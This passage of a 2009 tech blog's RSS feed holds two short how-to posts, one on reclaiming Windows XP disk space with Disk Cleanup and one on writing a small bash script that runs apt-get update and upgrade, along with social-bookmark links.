			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;title=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;title=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;title=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;title=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;title=Windows+XP+Roaming+Profile+Synchronization+Issues&amp;desc=Roaming%20profiles%20allow%20us%20to%20access%20files%20that%20we%20often%20use%20on%20any%20computer%20joined%20to%20the%20network%2C%20easily%20replace%20old%20computers%2C%20and%20provide%20greater%20network%20security.%20%20There%20are%20on%20occasion%2C%20special%20circumstances%20that%20cause%20the%20log-on%2Flog-off%20synchronization%20process%20of%20these%20profiles%20to%20fail.%20%20Gener" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;t=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;bm_description=Windows+XP+Roaming+Profile+Synchronization+Issues&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;title=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;title=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/&amp;t=Windows+XP+Roaming+Profile+Synchronization+Issues" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Windows+XP+Roaming+Profile+Synchronization+Issues+-+http://tinyurl.com/yhqfw6j&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/307/windows-xp-roaming-profile-synchronization-issues/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows XP &#8211; Reclaim Lost Hard Drive Space</title>
		<link>http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/</link>
		<comments>http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/#comments</comments>
		<pubDate>Sat, 07 Nov 2009 14:02:23 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Windows]]></category>
		<category><![CDATA[XP]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=292</guid>
		<description><![CDATA[The network I administer at work has an even mix of new and old computers. The problem with the older computers are the small hard drives and low amount of memory. I constantly have employees telling me that their computers are running slower than normal and that they are getting low resources error messages. Below [...]]]></description>
			<content:encoded><![CDATA[<p>The network I administer at work has an even mix of new and old computers. The problem with the older computers are the small hard drives and low amount of memory. I constantly have employees telling me that their computers are running slower than normal and that they are getting low resources error messages.</p>
<p>Below are the steps I use to free up space on these machines:</p>
<ol style="background-color: #f8f8f8">
<li>Click Start =&gt; My Computer</li>
<li>Now we want to right click on the drive that Windows is installed on and click on Properties.</li>
<li>Once the properties dialog opens, click on Disk Cleanup. (This will take a few seconds to minutes to load)</li>
</ol>
<p>The next steps require a little more explanation.</p>
<p>Before we use Disk Cleanup to get rid of any files, let&#8217;s click on the more options tab. This tab allows us to remove components, installed programs that we don&#8217;t use and old system restore points. Assuming you have system restore enabled, which by default it is, you will be able to regain a considerable amount of space by selecting this option.</p>
<p>Look at the amount of free space you have and remember the number. Now click on the Clean Up button for System Restore and answer yes to the prompt. You will not see any progress bar or get confirmation that this operation has completed. Wait about 10 seconds and view your free space again. Did the number change? When I did this on my computer I regained a little over 3 gigs!</p>
<p>Now click back on the Disk Cleanup tab. This tab gives us a list of file types with the amount of space they take up plus their descriptions down below. Click on each one to find out what they do to help you decide if you should delete them or not. I typically delete everything except for Office setup files and I don&#8217;t compress old files. Once you have the files you want to remove selected click on ok and answer yes to the prompt.</p>
<p>That&#8217;s pretty much sums up the process I use to reclaim drive space on Windows XP machines.</p>
<small>GHTime Code(s): 25e9a&nbsp;52ce5&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;title=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;title=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;title=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;title=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;title=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space&amp;desc=The%20network%20I%20administer%20at%20work%20has%20an%20even%20mix%20of%20new%20and%20old%20computers.%20The%20problem%20with%20the%20older%20computers%20are%20the%20small%20hard%20drives%20and%20low%20amount%20of%20memory.%20I%20constantly%20have%20employees%20telling%20me%20that%20their%20computers%20are%20running%20slower%20than%20normal%20and%20that%20they%20are%20getting%20low%20resources%20error" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;t=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;bm_description=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;title=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;title=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/&amp;t=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Windows+XP+-+Reclaim+Lost+Hard+Drive+Space+-+http://tinyurl.com/yf3f35a&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/292/windows-xp-reclaim-lost-hard-drive-space/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux System Update Script</title>
		<link>http://blog.ndarkness.com/blog/280/linux-system-update-script/</link>
		<comments>http://blog.ndarkness.com/blog/280/linux-system-update-script/#comments</comments>
		<pubDate>Sat, 07 Nov 2009 02:07:47 +0000</pubDate>
		<dc:creator>safety</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Utilities]]></category>
		<category><![CDATA[Slackware]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://blog.ndarkness.com/?p=280</guid>
		<description><![CDATA[In my experience with Linux distributions, Slackware and Ubuntu/Kubuntu, there are a couple of different methods used to update the system. Of course we can always use a gui to do the updates but what fun is that? The two commands used to update a Debian based system are: safety@nDarkness:~/bin$ sudo apt-get update; sudo apt-get [...]]]></description>
			<content:encoded><![CDATA[<p>In my experience with Linux distributions, Slackware and Ubuntu/Kubuntu, there are a couple of different methods used to update the system. Of course we can always use a gui to do the updates but what fun is that?</p>
<p>The two commands used to update a Debian based system are:</p>
<pre class="brush: bash;">
safety@nDarkness:~/bin$ sudo apt-get update; sudo apt-get upgrade
</pre>
<p>Now while this doesn&#8217;t require a great deal of typing, let&#8217;s see if we can shorten it to suit our needs.</p>
<p>If you do not already have somewhere to store your personal scripts, the following command will do this for you and allow you to enter the code we will use:</p>
<pre class="brush: bash;">
safety@nDarkness:~$ mkdir bin; cd bin; vi apt-auto
</pre>
<p>Press i for insert and create the following script:</p>
<pre class="brush: bash; gutter: true;">
#!/bin/bash

sudo apt-get update; sudo apt-get upgrade
</pre>
<p>This is all we need to type for our script to produce the results we are looking for. Now let&#8217;s save our script by pressing Esc =&gt; :wq =&gt; .</p>
<p>To run our script we can type:</p>
<pre class="brush: bash;">
safety@nDarkness:~/bin$ bash ./apt-auto
</pre>
<p>You should see the output from the two commands used in the script printed to the screen. Now let&#8217;s make our script executable so we don&#8217;t have to type bash to make it run.</p>
<p>The following command will accomplish what we are looking for:</p>
<pre class="brush: bash;">
safety@nDarkness:~/bin$ chmod +x apt-auto
</pre>
<p>Now to run our command we simply need to type:</p>
<pre class="brush: bash;">
safety@nDarkness:~/bin$ ./apt-auto
</pre>
<p>We now have a working script to do our update process and it is significantly shorter than the first option we used. As always all comments are welcomed. </p>
<small>GHTime Code(s): 47bd7&nbsp;nc&nbsp;</small>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-enjoy">
<ul class="socials">
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;title=Linux+System+Update+Script" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;title=Linux+System+Update+Script" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;title=Linux+System+Update+Script" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-slashdot">
			<a href="http://slashdot.org/bookmark.pl?url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;title=Linux+System+Update+Script" rel="nofollow" class="external" title="Submit this to SlashDot">Submit this to SlashDot</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;title=Linux+System+Update+Script&amp;desc=In%20my%20experience%20with%20Linux%20distributions%2C%20Slackware%20and%20Ubuntu%2FKubuntu%2C%20there%20are%20a%20couple%20of%20different%20methods%20used%20to%20update%20the%20system.%20Of%20course%20we%20can%20always%20use%20a%20gui%20to%20do%20the%20updates%20but%20what%20fun%20is%20that%3F%0D%0A%0D%0AThe%20two%20commands%20used%20to%20update%20a%20Debian%20based%20system%20are%3A%0D%0A%0D%0A%5Bcode%20lang%3D%22bash%22%5D%0D%0As" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;t=Linux+System+Update+Script" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;bm_description=Linux+System+Update+Script&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;title=Linux+System+Update+Script" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;title=Linux+System+Update+Script" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://blog.ndarkness.com/blog/280/linux-system-update-script/&amp;t=Linux+System+Update+Script" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://blog.ndarkness.com/blog/280/linux-system-update-script/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Linux+System+Update+Script+-+http://tinyurl.com/ylhow8d&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://blog.ndarkness.com/blog/280/linux-system-update-script/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

]]></content:encoded>
			<wfw:commentRss>http://blog.ndarkness.com/blog/280/linux-system-update-script/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
